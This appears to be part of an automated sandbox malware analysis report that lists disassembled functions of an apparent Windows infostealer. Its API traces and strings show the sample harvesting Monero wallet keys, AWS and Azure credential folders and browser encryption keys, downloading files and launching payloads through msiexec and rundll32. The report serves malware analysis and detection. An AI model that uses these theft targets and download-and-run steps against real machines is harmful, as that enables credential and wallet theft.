                        • Instruction ID: 76558569fb4042f1185893ca954b9d81664fc43cde9d7411ac8067c16c878505
                        • Opcode Fuzzy Hash: 1a0f43f41f270ac214b25b65e24aea44495f135c3c47f98cdf1cff69c39f6544
                        • Instruction Fuzzy Hash: E4C174B59502199BCB14EF60DC89FEE7778BF94304F0085A8F50EA7241DB70AAA5CF91
                        Function 00278320 Relevance: 26.4, APIs: 11, Strings: 4, Instructions: 196registryCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 0027A740: lstrcpy.KERNEL32(00280E17,00000000), ref: 0027A788
                        • RegOpenKeyExA.ADVAPI32(00000000,00E2B038,00000000,00020019,00000000,002805B6), ref: 002783A4
                        • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00278426
                        • wsprintfA.USER32 ref: 00278459
                        • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 0027847B
                        • RegCloseKey.ADVAPI32(00000000), ref: 0027848C
                        • RegCloseKey.ADVAPI32(00000000), ref: 00278499
                          • Part of subcall function 0027A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0027A7E6
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1798593544.0000000000261000.00000040.00000001.01000000.00000003.sdmp, Offset: 00260000, based on PE: true
                        • Associated: 00000000.00000002.1798512937.0000000000260000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1798593544.0000000000311000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1798593544.000000000031D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1798593544.0000000000342000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1798593544.00000000004AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.00000000004BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.000000000063F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.0000000000717000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.0000000000739000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.000000000073F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.000000000074F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799565875.0000000000750000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799815431.00000000008E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799842494.00000000008E2000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_260000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: CloseOpenlstrcpy$Enumwsprintf
                        • String ID: - $%s\%s$0$?
                        • API String ID: 3246050789-3244362230
                        • Opcode ID: 5482b117ba971a5fe6960481aae44b88e212097db4c87186bcbd3cc8cdf52b28
                        • Instruction ID: 9c32f5e7279287270ba018ac0ffe60d3af933d6499adf44ec90691c61c5bea9d
                        • Opcode Fuzzy Hash: 5482b117ba971a5fe6960481aae44b88e212097db4c87186bcbd3cc8cdf52b28
                        • Instruction Fuzzy Hash: 92813F71921118ABDB64DF54CC95FEEB7B8BF48710F00C298E10AA6180DF706B99CF95
                        Function 0026C990 Relevance: 24.9, APIs: 13, Strings: 1, Instructions: 384filestringCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 0027A740: lstrcpy.KERNEL32(00280E17,00000000), ref: 0027A788
                          • Part of subcall function 0027A920: lstrcpy.KERNEL32(00000000,?), ref: 0027A972
                          • Part of subcall function 0027A920: lstrcat.KERNEL32(00000000), ref: 0027A982
                          • Part of subcall function 0027A8A0: lstrcpy.KERNEL32(?,00280E17), ref: 0027A905
                          • Part of subcall function 0027A9B0: lstrlen.KERNEL32(?,00E28E80,?,\Monero\wallet.keys,00280E17), ref: 0027A9C5
                          • Part of subcall function 0027A9B0: lstrcpy.KERNEL32(00000000), ref: 0027AA04
                          • Part of subcall function 0027A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0027AA12
                        • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,00E2D558,00000000,?,0028144C,00000000,?,?), ref: 0026CA6C
                        • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 0026CA89
                        • GetFileSize.KERNEL32(00000000,00000000), ref: 0026CA95
                        • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 0026CAA8
                        • ReadFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 0026CAD9
                        • StrStrA.SHLWAPI(?,00E2D3C0,00280B52), ref: 0026CAF7
                        • StrStrA.SHLWAPI(00000000,00E2D3F0), ref: 0026CB1E
                        • StrStrA.SHLWAPI(?,00E2DBF0,00000000,?,00281458,00000000,?,00000000,00000000,?,00E29030,00000000,?,00281454,00000000,?), ref: 0026CCA2
                        • StrStrA.SHLWAPI(00000000,00E2DCF0), ref: 0026CCB9
                          • Part of subcall function 0026C820: lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 0026C871
                          • Part of subcall function 0026C820: CryptStringToBinaryA.CRYPT32(?,00000000), ref: 0026C87C
                        • StrStrA.SHLWAPI(?,00E2DCF0,00000000,?,0028145C,00000000,?,00000000,00E29040), ref: 0026CD5A
                        • StrStrA.SHLWAPI(00000000,00E28EF0), ref: 0026CD71
                          • Part of subcall function 0026C820: lstrcat.KERNEL32(?,00280B46), ref: 0026C943
                          • Part of subcall function 0026C820: lstrcat.KERNEL32(?,00280B47), ref: 0026C957
                          • Part of subcall function 0026C820: lstrcat.KERNEL32(?,00280B4E), ref: 0026C978
                        • lstrlen.KERNEL32(00000000), ref: 0026CE44
                        • CloseHandle.KERNEL32(00000000), ref: 0026CE9C
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1798593544.0000000000261000.00000040.00000001.01000000.00000003.sdmp, Offset: 00260000, based on PE: true
                        • Associated: 00000000.00000002.1798512937.0000000000260000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1798593544.0000000000311000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1798593544.000000000031D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1798593544.0000000000342000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1798593544.00000000004AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.00000000004BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.000000000063F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.0000000000717000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.0000000000739000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.000000000073F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.000000000074F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799565875.0000000000750000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799815431.00000000008E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799842494.00000000008E2000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_260000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Filelstrcat$lstrcpy$lstrlen$Pointer$BinaryCloseCreateCryptHandleReadSizeString
                        • String ID:
                        • API String ID: 3744635739-3916222277
                        • Opcode ID: ed9cacaeb2e15ad84cbb0262a1abe6bf88f481fa18329a71b89d3a8a96f11aa7
                        • Instruction ID: 3996998d872b7752b93f8256e107c9efc68cb36b3d4e03083262984ace69286f
                        • Opcode Fuzzy Hash: ed9cacaeb2e15ad84cbb0262a1abe6bf88f481fa18329a71b89d3a8a96f11aa7
                        • Instruction Fuzzy Hash: C2E12171C20108ABDB15EBA0DC96FEFB778AF54310F408169F11A67191DF306A6ACF66
                        Function 00274D70 Relevance: 22.6, APIs: 6, Strings: 9, Instructions: 123stringCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 00278DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00278E0B
                        • lstrcat.KERNEL32(?,00000000), ref: 00274DB0
                        • lstrcat.KERNEL32(?,\.azure\), ref: 00274DCD
                          • Part of subcall function 00274910: wsprintfA.USER32 ref: 0027492C
                          • Part of subcall function 00274910: FindFirstFileA.KERNEL32(?,?), ref: 00274943
                        • lstrcat.KERNEL32(?,00000000), ref: 00274E3C
                        • lstrcat.KERNEL32(?,\.aws\), ref: 00274E59
                          • Part of subcall function 00274910: StrCmpCA.SHLWAPI(?,00280FDC), ref: 00274971
                          • Part of subcall function 00274910: StrCmpCA.SHLWAPI(?,00280FE0), ref: 00274987
                          • Part of subcall function 00274910: FindNextFileA.KERNEL32(000000FF,?), ref: 00274B7D
                          • Part of subcall function 00274910: FindClose.KERNEL32(000000FF), ref: 00274B92
                        • lstrcat.KERNEL32(?,00000000), ref: 00274EC8
                        • lstrcat.KERNEL32(?,\.IdentityService\), ref: 00274EE5
                          • Part of subcall function 00274910: wsprintfA.USER32 ref: 002749B0
                          • Part of subcall function 00274910: StrCmpCA.SHLWAPI(?,002808D2), ref: 002749C5
                          • Part of subcall function 00274910: wsprintfA.USER32 ref: 002749E2
                          • Part of subcall function 00274910: PathMatchSpecA.SHLWAPI(?,?), ref: 00274A1E
                          • Part of subcall function 00274910: lstrcat.KERNEL32(?,00E2E928), ref: 00274A4A
                          • Part of subcall function 00274910: lstrcat.KERNEL32(?,00280FF8), ref: 00274A5C
                          • Part of subcall function 00274910: lstrcat.KERNEL32(?,?), ref: 00274A70
                          • Part of subcall function 00274910: lstrcat.KERNEL32(?,00280FFC), ref: 00274A82
                          • Part of subcall function 00274910: lstrcat.KERNEL32(?,?), ref: 00274A96
                          • Part of subcall function 00274910: CopyFileA.KERNEL32(?,?,00000001), ref: 00274AAC
                          • Part of subcall function 00274910: DeleteFileA.KERNEL32(?), ref: 00274B31
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1798593544.0000000000261000.00000040.00000001.01000000.00000003.sdmp, Offset: 00260000, based on PE: true
                        • Associated: 00000000.00000002.1798512937.0000000000260000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1798593544.0000000000311000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1798593544.000000000031D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1798593544.0000000000342000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1798593544.00000000004AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.00000000004BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.000000000063F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.0000000000717000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.0000000000739000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.000000000073F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.000000000074F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799565875.0000000000750000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799815431.00000000008E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799842494.00000000008E2000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_260000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcat$File$Findwsprintf$Path$CloseCopyDeleteFirstFolderMatchNextSpec
                        • String ID: *.*$*.*$Azure\.IdentityService$Azure\.aws$Azure\.azure$\.IdentityService\$\.aws\$\.azure\$msal.cache
                        • API String ID: 949356159-974132213
                        • Opcode ID: 9a0b44be5077e9c8c1a74e773a775fbe2049226bf87315db93d7885c50fd3247
                        • Instruction ID: 78c38a16050306243e005edd545a6b33bb5ba9ca91f59be1ba1aa1b76d7fdb9a
                        • Opcode Fuzzy Hash: 9a0b44be5077e9c8c1a74e773a775fbe2049226bf87315db93d7885c50fd3247
                        • Instruction Fuzzy Hash: 2141B3BA96020866C754F770DC47FED7638AB65700F0084A4B689660C1EEB46BF98B93
                        Function 00279010 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 184COMMON
                        Download Yara Rule
                        APIs
                        • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 0027906C
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1798593544.0000000000261000.00000040.00000001.01000000.00000003.sdmp, Offset: 00260000, based on PE: true
                        • Associated: 00000000.00000002.1798512937.0000000000260000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1798593544.0000000000311000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1798593544.000000000031D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1798593544.0000000000342000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1798593544.00000000004AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.00000000004BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.000000000063F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.0000000000717000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.0000000000739000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.000000000073F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.000000000074F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799565875.0000000000750000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799815431.00000000008E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799842494.00000000008E2000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_260000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: CreateGlobalStream
                        • String ID: image/jpeg
                        • API String ID: 2244384528-3785015651
                        • Opcode ID: 4309eb041b58246bbac41ad7dcc3acab908fc73593ec17f0e10def634b0ff5a9
                        • Instruction ID: addd97084c62a2a254382f0c56c00686e6fffa660085e1eaace97c07ffc5e628
                        • Opcode Fuzzy Hash: 4309eb041b58246bbac41ad7dcc3acab908fc73593ec17f0e10def634b0ff5a9
                        • Instruction Fuzzy Hash: 07711CB5910208ABDB04EFE4DC89FEEBBB8BF48700F108518F516A7290DB74A954CF65
                        Function 00272E30 Relevance: 19.7, APIs: 3, Strings: 8, Instructions: 469COMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 0027A740: lstrcpy.KERNEL32(00280E17,00000000), ref: 0027A788
                        • ShellExecuteEx.SHELL32(0000003C), ref: 002731C5
                        • ShellExecuteEx.SHELL32(0000003C), ref: 0027335D
                        • ShellExecuteEx.SHELL32(0000003C), ref: 002734EA
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1798593544.0000000000261000.00000040.00000001.01000000.00000003.sdmp, Offset: 00260000, based on PE: true
                        • Associated: 00000000.00000002.1798512937.0000000000260000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1798593544.0000000000311000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1798593544.000000000031D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1798593544.0000000000342000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1798593544.00000000004AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.00000000004BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.000000000063F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.0000000000717000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.0000000000739000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.000000000073F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.000000000074F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799565875.0000000000750000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799815431.00000000008E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799842494.00000000008E2000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_260000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: ExecuteShell$lstrcpy
                        • String ID: /i "$ /passive$"" $.dll$.msi$<$C:\Windows\system32\msiexec.exe$C:\Windows\system32\rundll32.exe
                        • API String ID: 2507796910-3625054190
                        • Opcode ID: 87b11f1f60800528792c498ffa24e5a1e3f6f79ad9e96cbfa7a21502640d045e
                        • Instruction ID: a74d17646fe323b528c337f976c5d7e88ad9a7535d459a6b048f6ff1da01a2fd
                        • Opcode Fuzzy Hash: 87b11f1f60800528792c498ffa24e5a1e3f6f79ad9e96cbfa7a21502640d045e
                        • Instruction Fuzzy Hash: E6122171820108DADB19FBA0CC92FEEB738AF54310F508169F51B66191EF742B6ACF56
                        Function 002752C0 Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 139stringCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 0027A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0027A7E6
                          • Part of subcall function 00266280: InternetOpenA.WININET(00280DFE,00000001,00000000,00000000,00000000), ref: 002662E1
                          • Part of subcall function 00266280: StrCmpCA.SHLWAPI(?,00E2EA78), ref: 00266303
                          • Part of subcall function 00266280: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00266335
                          • Part of subcall function 00266280: HttpOpenRequestA.WININET(00000000,GET,?,00E2DE60,00000000,00000000,00400100,00000000), ref: 00266385
                          • Part of subcall function 00266280: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 002663BF
                          • Part of subcall function 00266280: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 002663D1
                          • Part of subcall function 0027A8A0: lstrcpy.KERNEL32(?,00280E17), ref: 0027A905
                        • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00275318
                        • lstrlen.KERNEL32(00000000), ref: 0027532F
                          • Part of subcall function 00278E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00278E52
                        • StrStrA.SHLWAPI(00000000,00000000), ref: 00275364
                        • lstrlen.KERNEL32(00000000), ref: 00275383
                        • lstrlen.KERNEL32(00000000), ref: 002753AE
                          • Part of subcall function 0027A740: lstrcpy.KERNEL32(00280E17,00000000), ref: 0027A788
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1798593544.0000000000261000.00000040.00000001.01000000.00000003.sdmp, Offset: 00260000, based on PE: true
                        • Associated: 00000000.00000002.1798512937.0000000000260000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1798593544.0000000000311000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1798593544.000000000031D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1798593544.0000000000342000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1798593544.00000000004AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.00000000004BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.000000000063F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.0000000000717000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.0000000000739000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.000000000073F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.000000000074F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799565875.0000000000750000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799815431.00000000008E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799842494.00000000008E2000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_260000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Internetlstrcpylstrlen$HttpOpenRequest$AllocConnectLocalOptionSend
                        • String ID: ERROR$ERROR$ERROR$ERROR$ERROR
                        • API String ID: 3240024479-1526165396
                        • Opcode ID: b623ec4e8c720a99d56c4b44151442e8065f0842cfebd46af40cc0c8677e652c
                        • Instruction ID: 027ceb448076e15f7c0a5f252887f9437db1349ac20531d0e2d721b56233bd61
                        • Opcode Fuzzy Hash: b623ec4e8c720a99d56c4b44151442e8065f0842cfebd46af40cc0c8677e652c
                        • Instruction Fuzzy Hash: 8E51FD309301489BCB18FF60CD96AEE7779AF90311F508128F81E5A591EF746B66CF62
                        Function 002660A0 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 133networkfileCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 0027A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0027A7E6
                          • Part of subcall function 002647B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00264839
                          • Part of subcall function 002647B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00264849
                        • InternetOpenA.WININET(00280DF7,00000001,00000000,00000000,00000000), ref: 0026610F
                        • StrCmpCA.SHLWAPI(?,00E2EA78), ref: 00266147
                        • InternetOpenUrlA.WININET(00000000,00000000,00000000,00000000,00000100,00000000), ref: 0026618F
                        • CreateFileA.KERNEL32(00000000,40000000,00000003,00000000,00000002,00000080,00000000), ref: 002661B3
                        • InternetReadFile.WININET(?,?,00000400,?), ref: 002661DC
                        • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 0026620A
                        • CloseHandle.KERNEL32(?,?,00000400), ref: 00266249
                        • InternetCloseHandle.WININET(?), ref: 00266253
                        • InternetCloseHandle.WININET(00000000), ref: 00266260
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1798593544.0000000000261000.00000040.00000001.01000000.00000003.sdmp, Offset: 00260000, based on PE: true
                        • Associated: 00000000.00000002.1798512937.0000000000260000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1798593544.0000000000311000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1798593544.000000000031D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1798593544.0000000000342000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1798593544.00000000004AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.00000000004BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.000000000063F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.0000000000717000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.0000000000739000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.000000000073F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.000000000074F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799565875.0000000000750000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799815431.00000000008E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799842494.00000000008E2000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_260000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Internet$CloseFileHandle$Open$CrackCreateReadWritelstrcpylstrlen
                        • String ID: x
                        • API String ID: 2507841554-2890206012
                        • Opcode ID: 7f853a4ea06e023a12b822a1156f1322ed8cf2a8e5123276eef8cdf1ce0c861e
                        • Instruction ID: 6341d530ebe21f8e0b3e86a35f38f6b86e457d044b6908c804ddb71067f99073
                        • Opcode Fuzzy Hash: 7f853a4ea06e023a12b822a1156f1322ed8cf2a8e5123276eef8cdf1ce0c861e
                        • Instruction Fuzzy Hash: 9D5194B1920218ABDF20DF50DC59BEE7778FB44701F1080A8B609A71C0DB74AAD5CF95
                        Function 00274280 Relevance: 16.7, APIs: 11, Instructions: 204stringCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 00278DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00278E0B
                        • lstrcat.KERNEL32(?,00000000), ref: 002742EC
                        • lstrcat.KERNEL32(?,00E2E4D8), ref: 0027430B
                        • lstrcat.KERNEL32(?,?), ref: 0027431F
                        • lstrcat.KERNEL32(?,00E2D480), ref: 00274333
                          • Part of subcall function 0027A740: lstrcpy.KERNEL32(00280E17,00000000), ref: 0027A788
                          • Part of subcall function 00278D90: GetFileAttributesA.KERNEL32(00000000,?,00261B54,?,?,0028564C,?,?,00280E1F), ref: 00278D9F
                          • Part of subcall function 00269CE0: StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 00269D39
                          • Part of subcall function 002699C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 002699EC
                          • Part of subcall function 002699C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00269A11
                          • Part of subcall function 002699C0: LocalAlloc.KERNEL32(00000040,?), ref: 00269A31
                          • Part of subcall function 002699C0: ReadFile.KERNEL32(000000FF,?,00000000,0026148F,00000000), ref: 00269A5A
                          • Part of subcall function 002699C0: LocalFree.KERNEL32(0026148F), ref: 00269A90
                          • Part of subcall function 002699C0: CloseHandle.KERNEL32(000000FF), ref: 00269A9A
                          • Part of subcall function 002793C0: GlobalAlloc.KERNEL32(00000000,002743DD,002743DD), ref: 002793D3
                        • StrStrA.SHLWAPI(?,00E2E3B8), ref: 002743F3
                        • GlobalFree.KERNEL32(?), ref: 00274512
                          • Part of subcall function 00269AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,N&,00000000,00000000), ref: 00269AEF
                          • Part of subcall function 00269AC0: LocalAlloc.KERNEL32(00000040,?,?,?,00264EEE,00000000,?), ref: 00269B01
                          • Part of subcall function 00269AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,N&,00000000,00000000), ref: 00269B2A
                          • Part of subcall function 00269AC0: LocalFree.KERNEL32(?,?,?,?,00264EEE,00000000,?), ref: 00269B3F
                        • lstrcat.KERNEL32(?,00000000), ref: 002744A3
                        • StrCmpCA.SHLWAPI(?,002808D1), ref: 002744C0
                        • lstrcat.KERNEL32(00000000,00000000), ref: 002744D2
                        • lstrcat.KERNEL32(00000000,?), ref: 002744E5
                        • lstrcat.KERNEL32(00000000,00280FB8), ref: 002744F4
                        Memory Dump Source
                        • Source File: 00000000.00000002.1798593544.0000000000261000.00000040.00000001.01000000.00000003.sdmp, Offset: 00260000, based on PE: true
                        • Associated: 00000000.00000002.1798512937.0000000000260000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1798593544.0000000000311000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1798593544.000000000031D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1798593544.0000000000342000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1798593544.00000000004AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.00000000004BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.000000000063F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.0000000000717000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.0000000000739000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.000000000073F000.00000040.00000001.01000000.00000003.sdmpDownload File
